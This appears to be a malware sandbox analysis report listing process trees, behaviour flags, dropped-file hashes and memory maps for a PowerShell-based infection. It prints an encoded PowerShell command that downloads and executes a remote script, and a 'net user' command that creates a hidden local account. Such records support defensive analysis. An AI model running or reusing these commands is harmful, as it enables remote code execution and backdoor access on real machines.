C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2dtkmchj\2dtkmchj.dllMD5
3c4dfa6c9d91ff3a402fd33a5e78ffd7
SHA1709aa066cb934f683585e64d70c0ea0b453986ce
SHA256245bb3f92b2121746b6e606166581b50d92a5248a31649b1dd8e732684667796
SHA51228becb490be5de37920fbecd96ebd913a05248e7f3d15361bbc44675e5e208479fd4397800b426970e5f6ad22f67a2d111fab5808963d31254f8c85b2e87c66f
-
C:\Users\Admin\AppData\Local\Temp\RES4CFD.tmpMD5
35e4a065694f1d9ca337f34bb0716d31
SHA1a619279311f8de7cb005f5f4ef8f949f640ce6b4
SHA2564a086b5bdb893e1a301b2ab2e33b386a3b8adeb1a95f80715fe3375372ed997f
SHA5124b15ed1a1203f3aec95d1a8ad286786fe39e6884c2ddccb02d3d2286cdc98a859cb2c3cd412e5139f7bb64b041d4d2a06ded77dc2ff76e5ae9882e367ddb828c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
\??\c:\Users\Admin\AppData\Local\Temp\2dtkmchj\2dtkmchj.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\2dtkmchj\2dtkmchj.cmdlineMD5
ad49c80e4edfbed6763ff5bf13324f98
SHA18dc12c01f3e834b2a80699d722305e3bd03a6f66
SHA256ed9b83f8fac2eddc1fcb0de758896ecfa33f744508effa89c9f6b0c1aaa23232
SHA512d816537976a85c9b763006f9ff35f82da6ed340c50c367c55ef232bd96b2252188bcd985228f013e1e19cb4f1db62b73ce1051bd99010e645ea6f58fda4e4137
-
\??\c:\Users\Admin\AppData\Local\Temp\2dtkmchj\CSC461E9C65B98B431FB3A9C62BD813267E.TMPMD5
41735fbe96e47e08c9b6a56d1af54000
SHA12c67fe0c3bf79be87217e5b3b08a3468f3563020
SHA256b98d781afc49299eff49d32a9e494cb50be0d37d7378006ac5912ca5974f7083
SHA5126a9c649b114d64c4f7b5dde8b6818e16fab964e9d9e98f017200b73d68abc3bc69394703a0905bd03429a852c6a2b6e4183c0b7a8afef1dd2bf2891a312583a7
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/428-19-0x0000000000000000-mapping.dmp
-
memory/700-18-0x0000000000000000-mapping.dmp
-
memory/1092-39-0x0000000000000000-mapping.dmp
-
memory/1184-31-0x0000000000000000-mapping.dmp
-
memory/1184-37-0x0000000000000000-mapping.dmp
-
memory/1288-38-0x0000000000000000-mapping.dmp
-
memory/1424-15-0x0000000000000000-mapping.dmp
-
memory/1432-45-0x0000000000000000-mapping.dmp
-
memory/1432-46-0x00007FFCC0970000-0x00007FFCC135C000-memory.dmpFilesize
9.9MB
-
memory/1652-36-0x0000000000000000-mapping.dmp
-
memory/1784-30-0x0000000000000000-mapping.dmp
-
memory/1812-16-0x0000000000000000-mapping.dmp
-
memory/2064-40-0x0000000000000000-mapping.dmp
-
memory/2064-21-0x0000000000000000-mapping.dmp
-
memory/2076-52-0x0000000000000000-mapping.dmp
-
memory/2076-32-0x0000000000000000-mapping.dmp
-
memory/2128-20-0x0000000000000000-mapping.dmp
-
memory/2128-34-0x0000000000000000-mapping.dmp
-
memory/2252-50-0x0000000000000000-mapping.dmp
-
memory/2516-53-0x0000000000000000-mapping.dmp
-
memory/2772-25-0x0000000000000000-mapping.dmp
-
memory/2940-27-0x0000000000000000-mapping.dmp
-
memory/3132-5-0x000002956A3C0000-0x000002956A3C1000-memory.dmpFilesize
4KB
-
memory/3132-2-0x0000000000000000-mapping.dmp
-
memory/3132-14-0x000002954F300000-0x000002954F301000-memory.dmpFilesize
4KB
-
memory/3132-4-0x0000029569870000-0x0000029569871000-memory.dmpFilesize
4KB
-
memory/3132-3-0x00007FFCC0970000-0x00007FFCC135C000-memory.dmpFilesize
9.9MB
-
memory/3188-33-0x0000000000000000-mapping.dmp
-
memory/3188-10-0x0000000000000000-mapping.dmp
-
memory/3476-24-0x0000000000000000-mapping.dmp
-
memory/3544-26-0x0000000000000000-mapping.dmp
-
memory/3600-35-0x0000000000000000-mapping.dmp
-
memory/3684-17-0x0000000000000000-mapping.dmp
-
memory/3708-43-0x0000000000000000-mapping.dmp
-
memory/3732-42-0x0000000000000000-mapping.dmp
-
memory/3732-7-0x0000000000000000-mapping.dmp
-
memory/3808-51-0x0000000000000000-mapping.dmp
-
memory/3820-44-0x0000000000000000-mapping.dmp
-
memory/3828-41-0x0000000000000000-mapping.dmp
-
memory/3828-22-0x0000000000000000-mapping.dmp
-
memory/3988-1-0x0000000002A40000-0x0000000002A41000-memory.dmpFilesize
4KB
-
memory/3996-23-0x0000000000000000-mapping.dmp